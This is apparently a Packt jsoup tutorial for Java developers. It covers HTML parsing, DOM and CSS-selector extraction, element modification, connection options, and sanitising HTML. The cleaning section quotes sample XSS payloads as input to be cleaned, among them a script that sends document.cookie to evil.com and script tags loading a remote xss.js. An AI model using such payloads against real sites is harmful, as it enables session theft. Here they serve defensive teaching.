Instant jsoup How-to

Chapter 1. Instant Jsoup How-to

Welcome to Instant Jsoup How-to. As you look around, you will see that many websites and services provide information through RSS, Atom, or even through a web service API; however, lots of sites don't provide such facilities. That is the reason why many HTML parsers arise to support the ability of web scraping. Jsoup, one among the popular HTML parsers for Java developers, stands as a powerful framework that gives developers an easy way to extract and transform HTML content. This book is therefore written with all the recipes that are needed to grab web information.

Giving input for parser (Must know)

HTML data for parsing can be stored in different types of sources such as local file, a string, or a URI. Let's have a look at how we can handle these types of input for parsing using Jsoup.

How to do it...

Create the Document class structure from Jsoup, depending on the type of input.

If the input is a string, use:

String html = "<html><head><title>jsoup: input with string</title></head><body>Such an easy task.</body></html>";
Document doc = Jsoup.parse(html);

If the input is from a file, use:

try {
File file = new File("index.html");
Document doc = Jsoup.parse(file, "utf-8");
} catch (IOException ioEx) {
    ioEx.printStackTrace();
}

If the input is from a URL, use:

Document doc = Jsoup.connect("http://www.example.com").get();

Include the correct package at the top.

import org.jsoup.Jsoup;
import.jsoup.nodes.Document;

Note

The complete example source code for this section is in \source\Section01.

The API reference for this section is available at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html

How it works...

Basically, all the inputs will be given to the Jsoup class to parse.

For an HTML string, you just need to pass the HTML string as parameter for the method Jsoup.parse().

For an HTML file, there are three parameters inputted for Jsoup.parse(). The first one is the file object, which points to the specified HTML file; the second one is the character set of the file. There is an overload of this method with an additional third parameter, Jsoup.parse(File file, String charsetName, String baseUri). The baseUri URL is the URL from where the HTML file is retrieved; it is used to resolve relative paths or links.

For a URL, you need to use the Jsoup.connect() method. Once the connection succeeds, it will return an object, thus implementing the connection interface. Through this, you can easily get the content of the URL page using the Connection.get() method.

The previous example is pretty easy and straightforward. The results of parsing from the Jsoup class will return a Document object, which represents a DOM structure of an HTML page, where the root node starts from <html>.

There's more...

Besides receiving the well-formed HTML as input, Jsoup library also supports input as a body fragment. This can be seen at the following location:

http://jsoup.org/apidocs/org/jsoup/Jsoup.html#parseBodyFragment(java.lang.String)

Tip

Downloading the example code

You can download the example code files for all Packt books you have purchased from your account at http://www.packtpub.com. If you purchased this book elsewhere, you can visit http://www.packtpub.com/support and register to have the files e-mailed directly to you.

Extracting data using DOM (Must know)

As the input is ready for extraction, we will begin with HTML parsing using the DOM method.

Note

If you don't know what DOM is, you can have a quick start with the DOM tutorial at:

http://www.w3schools.com/htmldom/

Let's move on to the details of how it works in Jsoup.

Getting ready

This section will parse the content of the page at, http://jsoup.org.

The index.html file in the project is provided if you want to have a file as input, instead of connecting to the URL.

How to do it...

The following screenshot shows the page that is going to be parsed:

By viewing the source code for this HTML page, we know the site structure.

The Jsoup library is quite supportive of the DOM navigation method; it provides ways to find elements and extract their contents efficiently.

Create the Document class structure by connecting to the URL.
```
Document doc = Jsoup.connect("http://jsoup.org").get();
```

Navigate to the menu tag whose class is nav-sections.

Elements navDivTag = doc.getElementsByClass("nav-sections");

Get the list of all menu tags that are owned by <a>.

Elements list = navDivTag.get(0).getElementsByTag("a");

Extract content from each Element class in the previous menu list.

for(Element menu: list) {
System.out.print(String.format("[%s]", menu.html()));
}

The output should look like the following screenshot after running the code:

The complete example source code for this section is placed at \source\Section02.

Note

The API reference for this section is available at:

http://jsoup.org/apidocs/org/jsoup/nodes/Element.html

How it works...

Let's have a look at the navigation structure:

html > body.n1-home > div.wrap > div.header > div.nav-sections > ul > li.n1-news > a

The div class="nav-sections" tag is the parent of the navigation section, so by using getElementsByClass("nav-sections"), it will move to this tag. Since there is only one tag with this class value in this example, we only need to extract the first found element; we will get it at index 0 (first item of results).

Elements navDivTag = doc.getElementsByClass("nav-sections");

The Elements object in Jsoup represents a collection (Collection<>) or a list (List<>); therefore, you can easily iterate through this object to get each element, which is known as an Element object.

When at a parent tag, there are several ways to get to the children. Navigate from subtag <ul>, and deeper to each <li> tag, and then to the <a> tag. Or, you can directly make a query to find all the <a> tags. That's how we retrieved the list that we found, as shown in the following code:

Elements list = navDivTag.get(0).getElementsByTag("a");

The final part is to print the extracted HTML content of each <a> tag.

Beware of the list value; even if the navigation fails to find any element, it is always not null, and therefore, it is good practice to check the size of the list before doing any other task.

Additionally, the Element.html() method is used to return the HTML content of a tag.

There's more...

Jsoup is quite a powerful library for DOM navigation. Besides the following mentioned methods, the other navigation types to find and extract elements are also supported in the Element class. The following are the common methods for DOM navigation:

Methods	Descriptions
`getElementById(String id)`	Finds an element by ID, including its children.
`getElementsByTag(String c)`	Finds elements, including and recursively under the element that calls this method, with the specified tag name (in this case, `c`).
`getElementsByClass(String className)`	Finds elements that have this class, including or under the element that calls this method. Case insensitive.
`getElementsByAttribute(String key)`	Find elements that have a named attribute set. Case insensitive. This method has several relatives, such as: `getElementsByAttributeStarting(String keyPrefix)` `getElementsByAttributeValue(String key, String value)` `getElementsByAttributeValueNot(String key, String value)`
`getElementsMatchingText(Pattern pattern)`	Finds elements whose text matches the supplied regular expression.
`getAllElements()`	Finds all elements under the specified element (including self and children of children).

There is a need to mention all methods that are used to extract content from an HTML element. The following table shows the common methods for extracting elements:

Methods	Descriptions
`id()`	This retrieves the ID value of an element.
`className()`	This retrieves the class name value of an element.
`attr(String key)`	This gets the value of a specific attribute.
`attributes()`	This is used to retrieve all the attributes.
`html()`	This is used to retrieve the inner HTML value of an element.
`data()`	This is used to retrieve the data content, usually applied for getting content from the `<script>` and `<style>` tags.
`text()`	This is used to retrieve the text content. This method will return the combined text of all inner children and removes all HTML tags, while the `html()` method returns everything between its open and closed tags.
`tag()`	This retrieves the tag of the element.

The following code will print the correspondent relative path of each <a> tag found in the menu list to demonstrate the use of the attr()method to get attribute content.

System.out.println("\nMenu and its relative path:");
for(Element menu: list) {
  System.out.println(String.format("[%s] href = %s", menu.html(), menu.attr("href")));
}

Extracting data using CSS selector (Must know)

Instead of using DOM navigation, the CSS selector method is used. Basically, the CSS selector is the way to identify the element based on how it is styled in CSS. Let's see how this works.

Getting ready

If you don't know the CSS selector syntax yet, I suggest finding some tutorials or guidelines to learn about it first.

Note

The following two links will be helpful for you to learn about CSS selector syntax:

How to do it...

Now we will try to use CSS selector syntax to do the same task that DOM navigation does. Basically, it is the same code as in the previous recipe but is a little different in the way we parse the content.

Create the Document class structure by loading the URL:
```
Document doc = Jsoup.connect(mUrl).get();
```
Select the <div> tag with the class attribute nav-sections:
```
Elements navDivTag = doc.select("div.nav-sections");
```
Select all the <a> tags:
```
Elements list = navDivTag.select("a");
```

Retrieve the results from the list:

for(Element menu: list) {
    System.out.print(String.format("[%s]", menu.html()));
}

As you try to execute this code, it will produce the same result as the previous recipe by using DOM navigation.

The complete example source code for this section is available at \source\Section03.

How it works...

It works like a charm! Well, there is actually no magic here. It's just that the selector query will give the direction to the target elements and Jsoup will find it for you. The select() method is written for this task so that you don't have to care a lot about it.

Through the query doc.select("div.nav-sections"), the Document class will try to find and return all the <div> tags that have class name equal to nav-sections.

It is even simpler when trying to find the children; Jsoup will look up every child and their children to find the tags that match the selector. That's how all the <a> tags are selected in step 3. Compared to DOM navigation, it is much simpler to use and easier to understand. Developers should know HTML page structure in order to use the CSS selector query.

There's more...

Please refer to the following pages for the usage of all CSS selector syntax to use in your application:

Transforming HTML elements (Must know)

Basically, an HTML parser does two things—extraction and transformation. While the extraction is described in previous recipes, this recipe is going to talk about transformation or modification.

How to do it...

In this section, I'm going to show you how to use Jsoup library to modify the following HTML page:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  </body>
</html>

Into this result we are adding some minor changes:

<html>
  <head>
    <title>Section 04: Modify elements' contents</title>
    <meta charset="utf-8" />
  </head>
  <body class=" content">
    <h1>Jsoup: the HTML parser</h1>
    <p align="center">Author: Johnathan Hedley</p>
    <p>It is a very powerful HTML parser! I love it so much...</p>
  </body>
</html>

Perform the following tasks:

Add a <meta> tag to <head>
Add a <p> tag for body content description
Add a <p> tag for body content author
Add an attribute to the <p> tag of the author
Add the class for the <body> tag

The previous tasks will be implemented in the following way:

Add a <meta> tag to <head>.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
doc.head().appendChild(tagMetaCharset);

Add a <p> tag for body content description.

Element tagPDescription = new Element(Tag.valueOf("p"), "");
tagPDescription.text("It is a very powerful HTML parser! I love it so much...");
doc.body().appendChild(tagPDescription);

Add a <p> tag for body content author.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

Add an attribute to the <p> tag of the author.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

Add a class for the <body> tag.
```
doc.body().addClass("content");
```

The complete example source code for this section is available at \source\Section04.

How it works...

As you see, the <meta> tag doesn't exist, so we need to create a new Element that represents the <meta> tag.

Element tagMetaCharset = new Element(Tag.valueOf("meta"), "");
tagMetaCharset.attr("charset", "utf-8");

The constructor of the Element object requires two parameters; one is the Tag object, and the other one is the base URI of the element. Usually, the base URI when creating the Tag object is an empty string, which means you can add the base URI when you want to specify where this Tag object should belong. One thing worth remembering is that the Tag class doesn't have a constructor and developers need to create it through the static method Tag.valueOf(String tagName) in order to create a Tag object.

In the next line, the attr(String key, String value) method is used to set the attribute value, where key is the name of the attribute.

doc.head().appendChild(tagMetaCharset);

Instead of looking up the <head> or <body> tag, Jsoup already provides two methods to get these two elements directly, which makes it very convenient to append a new child to the <head> tag. If you want to insert the <meta> tag before <title>, you can use the prependchild() method instead. The call to appendChild() will add a new element at the end of the list, while prependChild() will add a new element as the first child of the list.

Element tagPDescription = new Element(Tag.valueOf("p"), "");
  tagPDescription.text("It is a very powerful HTML parser! I love it so much...");

doc.body().appendChild(tagPDescription);

The second task is performed by the same code, basically.

Sometimes, you may find it too complicated to create objects and add to the parents; Jsoup provides support for the adding of objects to the HTML string the other way around.

tagPDescription.before("<p>Author: Johnathan Hedley</p>");

The third task is done by directly adding an HTML string as a sibling of the previous <p> tag. The before(Node node) method is similar to prependChild(Node node) but applied for inserting siblings.

The next task is to add the align=center attribute to the author <p> tag that we've just added. Up to this point, you may have learned various ways to navigate to this tag; well, I choose one easy way to achieve the task, that is, making a CSS selector get to the first <p> tag that contains the text Author in its HTML content.

Element tagPAuthor = doc.body().select("p:contains(Author)").first();
tagPAuthor.attr("align", "center");

The previous line performs a pseudo selector to demonstrate, and we add the attribute to it.

The final task can easily be achieved by using the addClass(String classname) method:

doc.body().addClass("content");

If you try to add an already existing class name, it won't add because Jsoup is smart enough to ensure that a class name only appears once in an element.

There's more...

What you previously saw is just a demonstration of the Jsoup library's capabilities in manipulating HTML elements contents through some common methods.

You will find more useful and convenient methods while working with Jsoup through its API reference page.

Miscellaneous Jsoup options (Should know)

Usually, developers only work on Jsoup with default options, unaware that it provides various useful options. This recipe will acquaint you with some common-use options.

How to do it...

How to work with connection objects:
- Setting userAgent: It is very important to always specify userAgent when sending HTTP requests. What if the web page displays some information differently on different browsers? The result of parsing might be different.
```
Document doc = Jsoup.connect(url).userAgent("Mozilla/5.0 (Windows NT 6.1)").get();
```
Especially when using Jsoup in Android, you must always specify a user agent; otherwise, it won't work properly.
- When forced to work with different content types:
```
Document doc = Jsoup.connect(url).ignoreContentType(true).get();
```
By default, Jsoup only allows working with HTML and XML content type and throws exceptions for others. So, you will need to specify this properly in order to work with other content types, such as RSS, Atom, and so on.
- Configure a connection timeout:
```
Document doc = Jsoup.connect(url).timeout(5000).get();
```
The default timeout for Jsoup is 3000 milliseconds (three seconds). Zero indicates an infinite timeout.
- Add a parameter request to the connection:
```
Document doc = Jsoup.connect(url).data("author", "Pete Houston").get();
```
In dynamic web, you need to specify a parameter to make a request; the data() method works for this purpose.
Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/Connection.html#data(java.lang.String, java.lang.String)
- Sometimes, the request is post.
```
Document doc = Jsoup.connect(url).data("author", "Pete Houston").post();
```
Setting the HTML output of the Document class.
This option works through the Document.OutputSettings class.
Note
Please refer to the following link for more information:
http://jsoup.org/apidocs/org/jsoup/nodes/Document.OutputSettings.html
This class outputs HTML text in a neat format with the following options:
- Character set: Get/set document charset
- Escape mode: Get/set escape mode of HTML output
- Indentation: Get/set indent amount for pretty printing (by space count)
- Outline: Enable/disable HTML outline mode
- Pretty print: Enable/disable pretty printing mode
For example, display the HTML output with; charset as utf-8 and the indentation amount as four spaces, enable the HTML outline mode, and enable pretty printing:
```
Document.OutputSettings settings = new Document.OutputSettings();
settings.charset("utf-8").indentAmount(4).outline(true).prettyPrint(true);
Document doc = …// create DOM object somewhere.doc.outputSettings(settings);
System.out.println(doc.html());
```
After setting the output format to Document, the content of Document is processed into the according format; call the Document.html()method for output result.
Configure the parser type.
Jsoup provides two parser types: HTML parser and XML parser.
By default, it uses HTML parser. However, if you are going to parse XML such as RSS or Atom, you should change the parser type to XML parser or it will not work properly.
```
Document doc = Jsoup.connect(url).parser(Parser.xmlParser()).get();
```

There's more...

The previously mentioned options in Jsoup are important ones that the developers should know and make use of.

However, there are several more that you can try:

DataUtil: This provides methods to load a file, or stream and transform into a Document object. To know more about this option, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/DataUtil.html
StringUtil: This provides methods to handle strings; for example, to search in array, join string array, or test string. To know more about this option, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/StringUtil.html
Validate: This provides methods to test objects, such as test empty, test null, and so on. To know more about this option, go to the following location:
http://jsoup.org/apidocs/org/jsoup/helper/Validate.html
Entities: This provides methods to test or get HTML entities. To know more about this option, go to the following location:
http://jsoup.org/apidocs/org/jsoup/nodes/Entities.html
Parser: This provides methods to parse HTML into Document. To know more about this option, go to the following location:
http://jsoup.org/apidocs/org/jsoup/parser/Parser.html

Cleaning dirty HTML documents (Become an expert)

HTML documents are not always well formed. This might expose some vulnerabilities for hackers to attack, such as Cross-site scripting (XSS). Luckily, Jsoup has already provided some methods for cleaning these invalid HTML documents. Additionally, Jsoup is capable of parsing the incorrect HTML and transforming it into the correct one. Let's have a look at how we can make a well-formed HTML document.

Getting ready

If you've never heard about XSS before, I suggest you learn more about it to follow this section.

Note

The following pages will give you an idea of XSS:

How to do it...

Our task in this section is to clean the buggy, XSSed HTML:

<html>
  <head>
  <title>Section 05: Clean dirty HTML</title>
  <meta http-equiv="refresh" content="0;url=javascript:alert('xss01');">
  <meta charset="utf-8" />
  </head>

  <body onload=alert('XSS02')>
    <h1>Jsoup: the HTML parser</h1>
    <scriptsrc=http://ha.ckers.org/xss.js></script>
    <img """><script>alert("XSS03")</script>">
    <imgsrc=# onmouseover="alert('xxs04')">
    <script/XSSsrc="http://ha.ckers.org/xss.js"></script>
    <script/src="http://ha.ckers.org/xss.js"></script>
    <iframesrc="javascript:alert('XSS05');"></iframe>
    <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" />
    <imgsrc="www.w3.org/html/logo/img/mark-only-icon.png" />
  </body>
</html>

If you open this file in the Chrome or Firefox browser, you will see the XSS. Just imagine that if users open this XSSed HTML and are redirected to a page that hackers have total control over, the hackers could, for example, steal users' cookies, which is very dangerous.

<img """>
<script>
document.location = 'http://evil.com/steal.php?cookie=' + document.cookie;
</script>">

There are thousand ways for XSS attacks to occur, so you should avoid and clean it; it's time for Jsoup to do its job.

Load the Document class structure.

File file = new File("index.html");
Document doc = Jsoup.parse(file, "utf-8");

Create a whitelist.

Whitelist allowList = Whitelist.relaxed();

Add more allowed tags and attributes.

allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Create Cleaner, which will do the cleaning task.
```
Cleaner cleaner = new Cleaner(allowList);
```
Clean the dirty HTML.
```
Document newDoc = cleaner.clean(doc);
```
Print the new clean HTML.
```
System.out.println(newDoc.html());
```

This is the result of the cleaning:

<html>
  <head>
  </head>
  <body>
    <h1>Jsoup: the HTML parser</h1>
  <script>
  </script>
  <img />
  <script>
  </script>&quot;&gt;
  <img />
  <script>
  </script>
  <script>
  </script>
  <iframe>
  </iframe>
  <imgsrc="http://www.w3.org/html/logo/img/mark-only-icon.png" />
  <img />
  </body>
</html>

Indeed, the resulting HTML is very clean and there is almost no script at all.

The complete example source code for this section is available at \source\Section05.

How it works...

The concept of cleaning dirty HTML in Jsoup is to identify the known safe tags and allow them in the result parse tree. These allowed tags are defined in Whitelist.

  Whitelist allowList = Whitelist.relaxed();
  allowList
  .addTags("meta", "title", "script", "iframe")
  .addAttributes("meta", "charset")
  .addAttributes("iframe", "src")
  .addProtocols("iframe", "src", "http", "https");

Here we define Whitelist, which is created through the relaxed() method and contains the following tags:

a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

If you want to add more tags, use the method addTags(String… tags). As you can see, the list of tags created through relaxed()doesn't have <meta>, <title>, <script>, and <iframe>, so I added them to the list manually by using addTags().

If the allowed tags have the attributes, you should add the list of allowed attributes to each tag.

One special attribute is src, which contains a URL to a file, and it's always a good practice to give a protocol to prevent inline scripting XSS. Consider the previous bug HTML line:

<iframesrc="javascript:alert('XSS05');">
</iframe>

The attribute "src" is supposed to refer to a URL but it actually does not. The fix is to ensure the "src" value is acquired through HTTP or HTTPS. That is what the following line means:

  .addProtocols("iframe", "src", "http", "https");

You can write in chain while adding tags or attributes.

While Whitelist provides the safe tag list, Cleaner, on the other hand, takes Whitelist as input to clean the input HTML:

  Cleaner cleaner = new Cleaner(allowList);
  Document newDoc = cleaner.clean(doc);

The new Document class is created after cleaning is done.

There's more...

Cleaner only keeps the allowed HTML tags provided by Whitelist input; everything else is removed.

For convenience, Jsoup supports the following five predefined white-lists:

none(): This allows only text nodes, all HTML will be stripped
simpleText(): This allows only simple text formatting, such as b, em, i, strong, and u
basic(): This allows a fuller range of text nodes, such as a, b, blockquote, br, cite, code, dd, dl, dt, em, i, li, ol, p, pre, q, small, strike, strong, sub, sup, u, and ul, and appropriate attributes
basicWithImages(): This allows the same text tags such as basic() and also allows the img tags, with appropriate attributes, with src pointing to http or https
relaxed(): This allows a full range of text and structural body HTML tags, such as a, b, blockquote, br, caption, cite, code, col, colgroup, dd, dl, dt, em, h1, h2, h3, h4, h5, h6, i, img, li, ol, p, pre, q, small, strike, strong, sub, sup, table, tbody, td, tfoot, th, thead, tr, u, and ul

Tags removed in <head>

If you pay more attention, you can see that everything inside the <head> tag is removed, even when you allow them in the whitelist as shown in the previous code.

Note

The current version of Jsoup is 1.7.2; please look up GitHub, lines 45 and 46, at the following location:

https://github.com/jhy/jsoup/blob/master/src/main/java/org/jsoup/safety/Cleaner.java#L45

The cleaner keeps and parses only <body>, not <head> as shown in the following code snippet:

  if (dirtyDocument.body() != null) 
  copySafeNodes(dirtyDocument.body(), clean.body());

So, if you want to clean the <head> tag instead of removing everything, get the code, modify it, and build your own package. Add the following two lines:

if (dirtyDocument.head() != null) 
copySafeNodes(dirtyDocument.head(), clean.head());

Instant jsoup How-to: Effectively extract and manipulate HTML content with the jsoup library

What do you get with eBook?

Product Details

Key benefits

Description

What you will learn

What do you get with eBook?

Product Details

Packt Subscriptions

Table of Contents

Recommendations for you

Customer reviews

Filter reviews by

People who bought this also bought

Authors (1)

FAQs